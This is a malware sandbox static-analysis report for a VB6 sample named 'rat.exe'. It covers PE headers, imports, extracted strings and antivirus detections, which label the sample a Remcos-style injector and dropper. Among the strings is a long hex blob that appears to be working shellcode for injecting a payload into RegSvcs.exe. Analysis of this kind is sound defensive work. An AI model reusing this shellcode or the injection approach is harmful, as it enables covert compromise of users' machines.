Static | ZeroBOX

PE Compile Time

2023-06-01 00:26:01

PE Imphash

ec7359737e4284389c0dec36902d6324

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0001934c 0x0001a000 6.59210128307
.data 0x0001b000 0x00000c74 0x00001000 0.0
.rsrc 0x0001c000 0x0000088c 0x00001000 1.87510899764

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0001c34c 0x00000128 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0001c34c 0x00000128 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0001c34c 0x00000128 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x0001c31c 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0001c150 0x000001cc LANG_ENGLISH SUBLANG_ENGLISH_US data

Imports

Library MSVBVM60.DLL:
0x401000 _CIcos
0x401004 _adj_fptan
0x401008 __vbaFreeVar
0x40100c __vbaAryMove
0x401010 __vbaStrVarMove
0x401014 __vbaLenBstr
0x401018 __vbaEnd
0x40101c __vbaFreeVarList
0x401020 _adj_fdiv_m64
0x401024 __vbaFreeObjList
0x401028 None
0x40102c _adj_fprem1
0x401030 __vbaStrCat
0x401034 __vbaSetSystemError
0x40103c _adj_fdiv_m32
0x401040 None
0x401044 __vbaAryVar
0x401048 __vbaAryDestruct
0x40104c __vbaObjSet
0x401050 __vbaOnError
0x401054 _adj_fdiv_m16i
0x401058 _adj_fdivr_m16i
0x40105c _CIsin
0x401060 None
0x401064 __vbaChkstk
0x401068 __vbaFileClose
0x40106c EVENT_SINK_AddRef
0x401074 None
0x401078 __vbaGet3
0x40107c __vbaStrCmp
0x401080 __vbaPutOwner3
0x401084 __vbaAryConstruct2
0x401088 __vbaI2I4
0x40108c DllFunctionCall
0x401090 _adj_fpatan
0x401094 __vbaRedim
0x401098 EVENT_SINK_Release
0x40109c __vbaUI1I2
0x4010a0 _CIsqrt
0x4010a8 __vbaExceptHandler
0x4010ac None
0x4010b0 __vbaStrToUnicode
0x4010b4 _adj_fprem
0x4010b8 _adj_fdivr_m64
0x4010bc None
0x4010c0 None
0x4010c4 __vbaFPException
0x4010c8 None
0x4010cc __vbaGetOwner3
0x4010d0 __vbaStrVarVal
0x4010d4 __vbaVarCat
0x4010d8 None
0x4010dc None
0x4010e0 None
0x4010e4 _CIlog
0x4010e8 __vbaErrorOverflow
0x4010ec __vbaFileOpen
0x4010f0 None
0x4010f4 None
0x4010f8 __vbaNew2
0x4010fc __vbaVar2Vec
0x401100 _adj_fdiv_m32i
0x401104 _adj_fdivr_m32i
0x401108 __vbaStrCopy
0x40110c __vbaFreeStrList
0x401110 _adj_fdivr_m32
0x401114 _adj_fdiv_r
0x401118 None
0x40111c None
0x401120 None
0x401124 __vbaAryLock
0x401128 __vbaStrToAnsi
0x40112c __vbaVarDup
0x401130 __vbaVarCopy
0x401134 None
0x401138 _CIatan
0x40113c __vbaUI1Str
0x401140 __vbaAryCopy
0x401144 __vbaStrMove
0x401148 None
0x40114c _allmul
0x401150 _CItan
0x401154 __vbaAryUnlock
0x401158 _CIexp
0x40115c __vbaFreeStr
0x401160 __vbaFreeObj

!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
Project1
MDIForm1
Created with GIMP
ICC_PROFILE
mntrRGB XYZ
.acspMSFT
&>M>=;
Hd"(j/V
BojXtKN
s#Zt*~
!0"134#%2&
3fI#tN
uDW:+]
Ampoz1
^K^Gx
lsc~9y5
Vcl`\B
2`fq%
"05Saq
6qT|%
NvqXm_v
<@S$-@
$nWq0J,
U8cIR<
Z$]8e:)f0
3nW+Z/k
7io(*Sx
[Kb`=kP
;e{9%3
Ks)a,>
024Qp
..l_Um
{9;*An
$F7)bt/1
UK"tYf
+!fg-
dzh.8+U
76T;,mE
dc`z6Y
kj>Z-q
;tuc[LpT
^s;K\Zq
-S5xl[
#4BRpr
]rXxy`
U8vL<+l
6d.lEr
*L;g\x
G}`.j>
{;4<~V
)>Dg]*4r
4[W:`*HO
xy\<o}
SHe{E=
Qkc},>
G"_kQNm
/X*g'l}
mD(6mz
5aDeE@
z?<]Lc
9E0a.e
i$j?<~
'CoJh8dfw~?
@-^I W
I1,BK_
!1AQaq
y0=plC
+D,Dw2Dn
f5*lQo&
7c5%5F
S4(fmU4*H
1tFj8v
tM&~R/8G
B<<;DT)
Ktbve*a
!1AQaq
:9;3X4
4d~</E
^Bl%4N
j\=%9&
U0T`,
FFFFFFFFF}
^^^^^_
sF^^^^^s
$ =aH>)
Fa9/S
zG4ddzFG
)/J|y
H|.CZqB
LXZ&|;
'dABrl
nrDZ:M
PC%8Rf-L3
v"L`qT
rQ2l>bq
"qHZpl
K:zgn}
ed:/Lg
EUm^}\
DeR%Vv
FnvVN\
a!2!jLr
MDIForm1
Project1
Project1
Module1
Module2
Module3
Class1
Project1
user32
CallWindowProcW
kernel32
C:\Windows\SysWow64\msvbvm60.dll\3
advapi32.dll
CryptAcquireContextA
CryptCreateHash
CryptHashData
CryptDeriveKey
CryptDestroyHash
CryptEncrypt
CryptDestroyKey
CryptReleaseContext
CryptDecrypt
FileExist
EncryptByte
EncryptString
DecryptByte
DecryptString
EncryptFile
DecryptFile
CallWindowProcA
VBA6.DLL
__vbaUI1I2
__vbaAryConstruct2
__vbaVarCopy
__vbaErrorOverflow
__vbaLenBstr
__vbaFreeObjList
__vbaStrCat
__vbaFreeObj
__vbaStrCmp
__vbaFileClose
__vbaGet3
__vbaFreeVarList
__vbaStrVarMove
__vbaI2I4
__vbaFileOpen
__vbaAryDestruct
__vbaFreeStrList
__vbaVar2Vec
__vbaAryMove
__vbaFreeStr
__vbaAryUnlock
__vbaHresultCheckObj
__vbaGenerateBoundsError
__vbaAryLock
__vbaNew2
__vbaStrMove
__vbaFreeVar
__vbaAryVar
__vbaAryCopy
__vbaOnError
__vbaStrCopy
__vbaSetSystemError
__vbaStrVarVal
__vbaVarDup
__vbaVarCat
__vbaUI1Str
MDIForm
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
__vbaEnd
__vbaPutOwner3
__vbaStrToUnicode
__vbaStrToAnsi
__vbaGetOwner3
__vbaRedim
__vbaObjSet
FilePath
byteArray
Password
SourceFile
DestFile
New_Value
VPh0uA
VRh0uA
VPh0uA
VRh0uA
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaFreeVar
__vbaAryMove
__vbaStrVarMove
__vbaLenBstr
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryVar
__vbaAryDestruct
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaChkstk
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaGet3
__vbaStrCmp
__vbaPutOwner3
__vbaAryConstruct2
__vbaI2I4
DllFunctionCall
_adj_fpatan
__vbaRedim
EVENT_SINK_Release
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaNew2
__vbaVar2Vec
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaAryLock
__vbaStrToAnsi
__vbaVarDup
__vbaVarCopy
_CIatan
__vbaUI1Str
__vbaAryCopy
__vbaStrMove
_allmul
_CItan
__vbaAryUnlock
_CIexp
__vbaFreeStr
__vbaFreeObj
ud*pbp
eK,4*U6
9Le\^N
(-v8az
Vh:;eg
3:DpU#
F!p![6mC
cDH>JM
%nffU8
8%(Hq
L-b'2
AB)_"P~
|#ufBC
xW?7"|WA
hr)u(\
G{[r@3
{|V@=A
gPN{&r
@"!G5I
#}* l%Lcr
2ZDc-K:
Lb@Z-{
`_^T5Z
6CY$N_
Ae~Ls]Y
pj\9|D
5/g'Ws
tA)%C,I
J'/+ E
nD8iupvh
5;*;a>
5^~}p[
rEmQp)
{;+.A
NC}-$1
H.shg%O%C07
/W?=dA
t6 1oW
0j{SoT
>$Cm,A
*&TV'B
:Rg53*:
Ai,:M;
x71v!J
Tt|E4T
}/d.L }qI
UcsB`Z4
2&K5<5
#VDx? C'
R5eN4h
9f&UEM6X^F
)Gf7kw
.F*Bg@=)
B/}<.#
|9"=]U
m}"woKk
YL1'7Z$
+lx)/n
%$`= aD
Ay!y;z(6
Mc5E^
^,`}'.
t,E$4,W
Vu`BK"
@o]Zflk
y9dWXF
me#<P$
'Si&n_/
Vq_}O1h8
c%W??A
x9CDG6
"z<mj:
Iql&qWm
#pOm|_D
_87x7d
MI_Hn2
_ >m2"
<}z;b@
/$:-VKx
)/2h1v
5w9!Y}
=*k#{W
>Y$.2vW
Zgw,-k
?,0GAe
8ca/"f
y^)9LAzB{
#|0AU`*
QQ]cG!
=UX`;Nd{]
0L|Fz'
E;]Z8q^<
B~BuJQ,
5Lho>sYJ
e{y>ef
?TE`KG
?ix2Q>U
[>U' B
3+H\\
 >PI+
9[\M4N
bUqBP
DE!6A!
N?Go[
#uI~5p
l |&aAZ
$3WT(C$I
0AJa7'j
Ca?G0
TVh YC
S4_c_t
.?eSS
$O\s*\FxI
d7u+}su"
.O"[. (
_z+Jlh3
F>?M]t
oCo[3a
':9U[\,
u7_xkb
IkKY/_
v65'\=
/[,''!k/
)#K:S\
:vQjMj
Ak?]!%
=#,*C&
Wny*T+
$0h0/j
-)>ygB
0+%!w"
t)&[fg
w|>&fmR
yvhT64
Dh-1/G
QtY7;9
Ja'-3i
rN%sg3Ya
]0pjub1
\E:wXs
U8D<LC
`3iIL`@8
dtPq~S
1/lbn3
AX]?qS|CLS
I@RM^'
ASR=hZq
{*gf:U
\3r#{g
V}=>VU
YRkUG=R_
<m=<MH~
DS,nuZ_
|1:hD=
x0)Hep]
fY'h+
Bb=s:QC
J,wxnMsW
YO5`a%
0S=qZ+
D?~gw[
B:4=^g
c1sZ6sg[V
74Lgu.
mTe 7e
YxVwLgq
ac+>f2!<*
wvL5I@
[dbl,+2G
7?S:[/
srGI5:
`TLDKS~5
D`4f-?
TuZVCs
rEN-~}
hMZ%rs+
lhA!U
k@X-Bu
`cj!U
p~C^Sb
}t0]j9/
p&Z+nN
6kx'x;
}0+?7e
Iv=M%
s~|{w7
h0jM&?*D
9eLg4l
i/J|C;
%`o_bn
Y*KPsKN
5@,g4:
to80G*p)
:Ec=;8
;RI)KFl
2:-hux
XqTQ/dU
D:WY6[
/^&5%
yRt$|+
q4v3mr
}^E9.,
jGgw5N
{Gg.+(
HU[}@3
|~[K{BV
H)r(t^
F9H-_W
<r"L,b
VL?Wy_q
x{4Lv-d
[&EY$["
RRr~E_
/<-@zB
FcKPd3p
Y&$#gm
m7E>@()n
|WzoH8
"TWM!>
Woa>%B
,E3~R*
vj3GA
wzK(^Q
\}81Ew
zXg\1
KQ:L"4
#[wYgQ
NQ0BE%
Z%U=//
cEUvq3
>$`;<!
TkH<:Y~
]`N`<@
xd4$V+
Tmb3o0
>9Xzrhv
D6/elRa
2qwuzU
PS9Qlw
nqCcp..`bi3
A^fV79
JGH%oa
{VvTK(
)/ez/
/DK&*k
LDBWbu
hH(_8l
b[FVGv?Z
9a49M.
"<yOsK
nG"3jQ
.a%%H(iA
%bqfpL L
<B]90<
&W^LPX(
Rm2_LqJY
N,bv6t
Baz)Q
Cs@^Am
NSwV$z
J4_m-!
Yuh$i)V
73t4qd
aJd (71
IY]=ffw0~
,)\eY3
VHaf.g
/8OxLA
"bo@Y'{
gLani
hw)5O;
D+8$3Ly{j
Co'id!9
/kgsJz^
<{>DpB
nlzR+sF
7[}k5|
YA'($a
y="3Dj
ZBvBtE
-pLUz^
oq)ig,
Q:^jpe&
tsP6aV+
($qsclbR
H~:GNJ
Zp+h?e
S"Fm-9e
/;uq0{
6uGDYdz
]h5}mX
8sb y0y
1s-6q[
::[ >
`*wR>@
W<{%N9
4su~$4
X`xD^OpZ
aE$Hk&d
\uCIt.
;,~uVc
ti]_N~F +
=V: A""
':qMsQl]
7~s^cbh
5d~X2"(MU
?CT#2?^7"}
I4t,<d
IW]6JH?
"5~#ov8
U1EO~a4
v_ip";
^-#f['
7jI%L=
$R%/3R
sEhVDTl
?\#Ve
Cuj\!?5
z?j";WQ
<fnzUz\
hxIaE}
pAKr9J
-G1^h
3I*t;kx
)b\VfD$D.q
QWSj|<
$.Qy(4-
.Rd~SHs
a7s;7 PuS
OMmqH
';{K:
EtGrt0@
~W78)r
#Jrl?*uZ
#1<CA*^
jylG%,#
\.O<pVU4
m8tBp]
A?NZD]R
\o}$Z+
e n&&Q
^{)M'
,~PBA'^
mY#L98
|fx_Is
yLWM$s
Otp,Z$
x"uh&"#E
WIg]wic
'a?"PEw
Dd@tc9
Ke#(ic
2/ZZfl
poh{eE
Y~'>c%
3D<@H*Y
3aizHk
nXQ\?@
D~(@]6nN
~vxrxJs
@3XzPcL
A4?[I)
\r'N\%=]
,p<Wot5
x"HYLg
Kc3,xT|m
ld-y[?
]\Gu:~
h$ho.a
H<zY7<
v627nq3
oO"0K=F
m alq~%
0Z}%?m
alH8FV
r7JIYi
a$wayv
L3z*_N
c&C2n;PS
=Of?<m
2><#c<
b%t(+a
tdY4yH
iP$niy;s
v92"vh
I!CYabC
XY1j6yg
RKF]kEN_
WKLD#K
hr[$'R
661$N8J
SrJpEyl
+jU8*$J
[t.(d(t
uC|-~J
729]8){
ugfA"L;Y
@w2ckWU=
L3S5\Q@
.@Kg$]
wNlW]z
Hlz$ZT
/Ohc6k
VD+H`-
\vg6i*^}vG
CYfse+H
v@F.I;
V`"nz
2j2j9l
gTve8e
IWwc?~:&
7p3*tu&
Ar2LO.0
Ui>.cKrD
f'5W{
O!&~PZP
EK4k`Rf
Q qUHQG)_^M
[Lf=2Dp
\U)jwwj_,
[,C113-
'f.q(f\s
S?FdNB
HG/Age
[tx*jB
0V\j-.4
+*GfXl
<_!2II-P
m[BP53
)bLga7
BI:XT5
;-}^FE\
,1+8?Q
U[+>\X
!b_KuZc
RY,MeOJ
5'$~at
=h8Zd`
\3tiu
z],'Ks_
l1!'K~U[Q
FhwwUZ?
9@<yATJ
AQv{.l
gz'Uts9
;0`OMM[
_O@[Xo
BvXIwr
&fXU]=
-%G,7+
v%O$%|L
A[&%~9!
M\w{0y
OBx#Yiz
U!gAlf
un<T|L
4ai*NZ/?
eJ@SlK
?1BD=Kl
!aPG)}8;%
K[Cu6D
d%R_"O
Ki~1GE
>_^W/#m
4&45f5
6SW%Dj
!NZo":
a!(^Nh
dNhi4p
QE|#V\
|l4w \G
qMb6pW
XWG<=Q
w@Y@-<<
3g% Yn
55QY;ks1
|"E4i@@
/%ipKI
DP8#,k
delDCw
v6]Mm *
f*V0dO
eMw45q
7`?V )
3@];_&
IPalT7
ZxJJit
wEu9B9
zp;WpK
q_(gKf
K5CD[^]
cOM"Nr
A]~z+e
<ZotT
L.U"'=
;\!JQ&
#(n82%A+
|2ns6!
hYe.SlW
_NguW}
nS9l-#
Fk`wqQ[
.cf6i0>_
kjiB6lz
mwS?ye
D-mwZ+/
mtJXhx9$
mnlu}gq
bAwE|bbMm
/V\J_9KKA
%>OSb{h
Fw2:vr
NK^"l{
@AB3{9
#MOl1S
r,}_uj
K~&;/!
/21Nq52
>6Wr|l
UW*j<X
D6u#![
u(Hv3e
|_&'2\
>j0FCWA
Kf%}je
xE>"{r
12Gmq[
xc3pw_
gH,HOfB/
kh6T0YVy
s>'*um!
D25Y,V
veA+7Qq
96KE_Fb
$%iu /
[@4@[Uh
FqQ@@pzX
#%CUxP*(
d (vr!
N^@cfI
h`tjvk
JNDR 7
rXKf&
qg+nL"
^4<p/eb
8'1POzm
~$eW`"
J5:9D
-5"Rut
N!_6#U
[hH12,
K|*xe&
T:Vd*Q
z4FJm2
tLF?,L
{7Fx$K|
4-F `:f
7[!m3=l
GDP,%V
/X<%?>
[)Z<H!
u"YQ]9
(VC./|
vu50#H
D-)n_p
(fWN|x
{O}C;1
P`mPlv
GLBcU s@z
Gk}b5>`[
(LSDE5a
S{cPo#
0felV\
<Xmv3g
Z%B@Rt
w0 U[Xy
{x+pd(t
JwAxsiB_YL
IjXX|Z
?&I*%x
GH|vKo
/xv(v
:{4Gl+
m!EW7K
3I5v-tV
D`.#b+Q
$dzupL
>y;3Eu
f<A4l9
U$a\i:
T$TSGl
!={,%_uCGM;
{dy|=rn
p560KvSVs
MttcwQB
l@K~3M9
^y7=JJ
* ^F[=
Bpg=\8I
7^F=ZPg
4w&l 1!
ukzKo!
%/tF&N
xbomyG*
of,D#)8
T&!`D-
'i wt\e
$wOXd>^
!a'|CW
WxNA5w
eZ[NT`
WC?zDbv
Lnv\Ma
jd"fv-
']ctH}:
>6;s-
khp!B_
D1|sb[;
u<;8Jz/
Rd*9\cGTm
xqI_B`
MiG&E*
*80l.da(
F/p!%W
I1O>vy
sR4ezBe
eZW4K9
"zt=+(
Og_h8C
?t2l!
B>Z9du
A[Pw8>
{'aY,\{
4iLNbH
e;%lM!T
rSL!*5
%+6$6Rz?
@65[Ys+
Ok4/0)
[3MbO
7En}+W
=S$0,a
660P8q
{{h'\[
kKK1g!
$UP(FK
)7P%~D
jJoJ;h
EFf$3g
z\k1gg
0~3tkV
Hf:P"P
)[C\`G
6S'GY#
`<mD_8\:
U%sS*D
>/~q?'
GaODy
[A<=hD
<Qbi83
nn4bpMF
/aV3/h
Pvr_9OK
Wes`RO
Dj;VG]>T
z!J-Wx
.w8>_hY|eV
d\^0:g
kUWLK>%
m R[oP
GM<Gp4b
oSGtT#
nFdWTa!;>!
s`"2W@j
e([Rh5
nw}Bv@]
Rkd,9/
(*er9b~
mNgPeK
>yc,?;~
/}1qixp
YhlI("
P"%g&6
&Z!!&LV
$&.XQxE|B^}@
G1}Ty}#
MQ. w;
lvrrO+
[EvL3c>:
,Jxr~2r`
VO1rGY
Ft)g?/
rhgV.s
4UrZ3*T%
H.`86h
SH k5H?'Z-
6wduX({
Sb]tVG
/`'R5v
yMe.jw
>vBr{l
Fg}t?(*W
/c.`=
LM> dj
;I*=>HtQ
=\/M]%
A>4R$(H
+R5(q3.
]Q!p{@
0mPyn2
.ER}St
[CUX;\
dO(&(JN
[by678
yo$&m2
&en3tym
W/Mlr'i
swPN=2 j
&!%TN x
("xrZe
CN!0eh$
I\u3xY
P\aV{0
,J)!q"
&6f\h~
!1w7MD
k+Xej5,
xo5i^TUT
xtzI9g
*^*1}/dfT@
>@B[4O=
e+ :nH
qPYh_7
{-K]XH
dr&'>i
q.vdD`
4+"9AP
B*D@(MV
#_P%aB
JoinJoinFileNameJoinRegKey
GIMP built-in sRG
Public Domain
A*\AC:\Users\ivan_\Desktop\new\Project1.vbp
Microsoft Base Cryptographic Provider v1.0
Metallica
C:\Windows\System32\calc.exe
mgznxelcl
WinDir
\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
-arguments
\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC56578B7D0833F657E8D7FFFFFF8BC885C974200FBE07C1E60403F08BC625000000F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5DC20400558BEC51515356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B401803CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C74148B55FC463B750872E733C05F5E5B8BE55DC208008B45F80FB704708B048303C7EBE9558BEC8B4D0833D28BC1663911740883C00266391075F82BC183E0FE5DC20400558BEC5356578B7D0885FF74578B5D0C85DB745057E8C6FFFFFF538BF0E8BEFFFFFF3BF0753E2BDFC74508610000000FB70F8BD1
0FB7343B8BC6663B4D08720681C2E0FF0000663B7508720505E0FF0000663BD0750E6685C9740583C702EBCF33C0EB0333C0405F5E5B5DC20800558BEC64A13000000056578B400C8B780C8BF7FF7508FF7630E874FFFFFF85C0740A8B363BF775EB33C0EB038B46185F5E5DC20400558BEC81EC24040000837D08005356570F84DC050000837D10000F84D20500006A6B586A65596A7266894588586A6E5E6A6C5F6A336689458C586A3266894594586A2E5A6A646689459633C066894D8A66894D9059668945A06A7458668945A633C0668945B68D45A4506689758E66897D926689559866894D9A66897D9C66897D9E668975A466894DA866897DAA66897DAC668955AE66894DB066897DB266897DB4E8
24FFFFFF8BF88D458850E819FFFFFF8BD8C78528FFFFFF793A3C078D45C4C7852CFFFFFF794A8A0B8985ECFEFFFF8D45D88985F0FEFFFF8D45B88985F4FEFFFF8D45848985F8FEFFFF8D45DC8985FCFEFFFF8D8574FFFFFF898500FFFFFF8D45D0C78530FFFFFFEE38830CC78534FFFFFF5764E101C78538FFFFFF18E4CA08C7853CFFFFFFE3CAD803C78540FFFFFF99B04806C78544FFFFFF93BA9403C78548FFFFFFE4C7B904C7854CFFFFFFE487B804C78550FFFFFFA92DD701C78554FFFFFF05D13D0BC78558FFFFFF4427230FC7855CFFFFFFE86F180DC78560FFFFFFB57DAE09898504FFFFFF8D8570FFFFFF898508FFFFFF8D458089850CFFFFFF8D8578FFFFFF898510FFFFFF8D857CFFFFFF8985
14FFFFFF8D45C0898518FFFFFF8D856CFFFFFF89851CFFFFFF8D45BC898520FFFFFF8D45E0898524FFFFFF33C08BF0FFB4B528FFFFFF83FE028BC70F4FC350E8DDFCFFFF8B8CB5ECFEFFFF890185C00F84E80300004683FE0F7CD433C040898564FFFFFF8D45E46A1050FF55D86A448D85A8FEFFFF50FF55D868CC0200008D85DCFBFFFFC785A8FEFFFF4400000050FF55D88B4D1033D2C785DCFBFFFF070001008BFA8B713C03F10FB746148955FC8955CC8945C83996A000000074163996A4000000740EF6461601750833DB43895DF8EB058BDA8955F833C08955D46639110F94C03D4D5A00000F844F03000033C039160F94C03D504500000F843D03000033C0663956040F94C03D4C0100000F842903
00008D45E4508D85A8FEFFFF5052526A04525252FF750CFF7508FF558485C00F84C50200008D85DCFBFFFF50FF75E8FF558085C00F84B002000033C0506A048D45CC508B8580FCFFFF83C00850FF75E4FF957CFFFFFF85C00F848C0200008B45CC3B4634750F50FF75E4FF55B885C00F85750200006A406800300000FF765033C050FF9574FFFFFF8BF885FF0F84580200006A406800300000FF7650FF7634FF75E4FF55DC8945FC85C0754185DB7518FF7634FF75E4FF55B86A406800300000FF7650FF7634EB146A406800300000FF765033C0C745D40100000050FF75E4FF55DC8945FC85C00F84FD010000FF7654FF751057FF55C433C933C0894DF4663B4606732E8B5DC883C32C03DEFF73FC8B0303
4510508B43F803C750FF55C48B4DF48D5B280FB7460641894DF43BC87CDC33C98B5F3C8B45FC03DF837DD4008943340F8481000000837DF800747B8B93A000000003D7894DF8398BA400000076688B420483E808894DF4A9FEFFFFFF76410FB74C4A086685C974248B463481E1FF0F0000030A2904398B45F40FB74C42088B433481E1FF0F0000030A0104398B42048B4DF483E80841D1E8894DF43BC872BF8B4DF8034A040352043B8BA40000006A00894DF859729833DB53FF765057FF75FCFF75E4FF55D085C00F840C0100008D8568FFFFFF506A02FF7654FF75FCFF75E4FF55BC85C00F84EF00000033C0895DF8663B4606736F8B5DC883C33C03DE8B03A900000020741985C079046A40EB17250000
0040F7D81BC083E01083C010EB1585C079056A0458EB0CA9000000406A00580F95C0408D8D68FFFFFF5150FF73E48B43E80345FC50FF75E4FF55BC85C074128B4DF883C3280FB7460641894DF83BC8729B33DB68008000005357FF55C085C07467536A048D45FC508B8580FCFFFF83C00850FF75E4FF55D085C0744C8B46280345FC89858CFCFFFF8D85DCFBFFFF50FF75E8FF9578FFFFFF85C0742CFF75E8FF956CFFFFFF85C0741F837DE4007406FF75E4FF55E0837DE8007406FF75E8FF55E08B45ECEB4333DB837DE400741053FF75E4FF9570FFFFFFFF75E4FF55E0837DE8007406FF75E8FF55E085FF740A68008000005357FF55C08B8564FFFFFF83F8050F8620FCFFFF33C05F5E5B8BE55DC20C00
Could not create a Hash Object (CryptCreateHash API)
Error in Skipjack EncryptFile procedure (Source file does not exist).
Error during CryptAcquireContext for a new key container.
A container with this name probably already exists.
Could not calculate a Hash Value (CryptHashData API)
Could not create a session key (CryptDeriveKey API)
Error during CryptEncrypt.
Error during CryptDecrypt.
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
ProductName
Project1
FileVersion
ProductVersion
InternalName
OriginalFilename
rat.exe
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Cqpib.4!c
tehtris Generic.Malware
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Gen:Trojan.Heur3.LPT.Hm3@a041cqpib
Malwarebytes Malware.AI.3281245526
VIPRE Gen:Trojan.Heur3.LPT.Hm3@a041cqpib
Sangfor Suspicious.Win32.Save.vb
K7AntiVirus Clean
BitDefender Gen:Trojan.Heur3.LPT.Hm3@a041cqpib
K7GW Clean
CrowdStrike win/malicious_confidence_100% (W)
Baidu Clean
VirIT Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Injector.ETAN
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba Trojan:Win32/Injector.40075313
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Gen:Trojan.Heur3.LPT.Hm3@a041cqpib
Tencent Win32.Trojan.Dropper.Vwhl
Sophos Mal/VB-FD
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.Inject4.58297
Zillya Clean
TrendMicro TROJ_GEN.R014C0RFD23
McAfee-GW-Edition BehavesLike.Win32.Trojan.hc
Trapmine malicious.high.ml.score
FireEye Generic.mg.3cc8d342301cf9a9
Emsisoft Gen:Trojan.Heur3.LPT.Hm3@a041cqpib (B)
SentinelOne Static AI - Malicious PE
Jiangmin Clean
Webroot W32.Trojan.Heur3.LPT.Hm3@a041cq
Avira TR/Dropper.Gen
MAX malware (ai score=89)
Antiy-AVL Clean
Microsoft Trojan:Win32/Wacatac.B!ml
Gridinsoft Trojan.Win32.Remcos.bot
Xcitium Clean
Arcabit Trojan.Heur3.LPT.E25F53
ViRobot Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic
GData Win32.Backdoor.Remcos.HF20RP
Google Detected
AhnLab-V3 Clean
Acronis suspicious
McAfee Artemis!3CC8D342301C
TACHYON Clean
DeepInstinct MALICIOUS
VBA32 Clean
Cylance unsafe
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R014C0RFD23
Rising Trojan.Injector!8.C4 (CLOUD)
Yandex Clean
Ikarus Trojan.Win32.Injector
MaxSecure Clean
Fortinet W32/Injector.DBRX!tr
BitDefenderTheta AI:Packer.8EC44E0E1F
AVG Win32:RATX-gen [Trj]
Cybereason malicious.2301cf
Avast Win32:RATX-gen [Trj]
No IRMA results available.